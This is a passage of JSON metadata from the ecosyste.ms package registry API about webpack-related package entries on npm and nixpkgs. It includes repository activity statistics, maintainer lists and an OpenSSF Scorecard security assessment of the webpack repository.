22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/sum-phuong/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/sum-phuong/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/sum-phuong/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/sum-phuong/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/sum-phuong/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/sum-phuong/codemeta","maintainers":[{"uuid":"phuonglvitdlu","login":"phuonglvitdlu","name":null,"email":"phuonglvitdlu@gmail.com","url":null,"packages_count":12,"html_url":"https://www.npmjs.com/~phuonglvitdlu","role":null,"created_at":"2024-06-21T01:00:25.267Z","updated_at":"2024-06-21T01:00:25.267Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/phuonglvitdlu/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":13064805,"name":"nodePackages.webpack","ecosystem":"nixpkgs","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T17:03:12.043Z","latest_release_published_at":"2026-02-01T17:03:12.043Z","latest_release_number":"5.94.0","last_synced_at":"2026-03-09T06:18:17.788Z","created_at":"2026-02-01T17:02:48.072Z","updated_at":"2026-08-30T03:20:17.570Z","registry_url":"https://search.nixos.org/packages?channel=24.11\u0026query=nodePackages.webpack","install_command":"nix-env -iA nixpkgs.nodePackages.webpack","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.11/pkgs/development/node-packages/node-packages.nix#L87845","metadata":{"nix_attribute":"webpack-5.94.0","position":"pkgs/development/node-packages/node-packages.nix:87845","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"],"upstream_ecosystem":"npm","upstream_name":"webpack","upstream_purl":"pkg:npm/webpack"},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpac